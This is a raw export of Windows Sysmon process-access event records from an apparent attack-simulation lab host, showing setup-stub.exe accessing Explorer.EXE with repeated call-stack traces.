13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.130{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 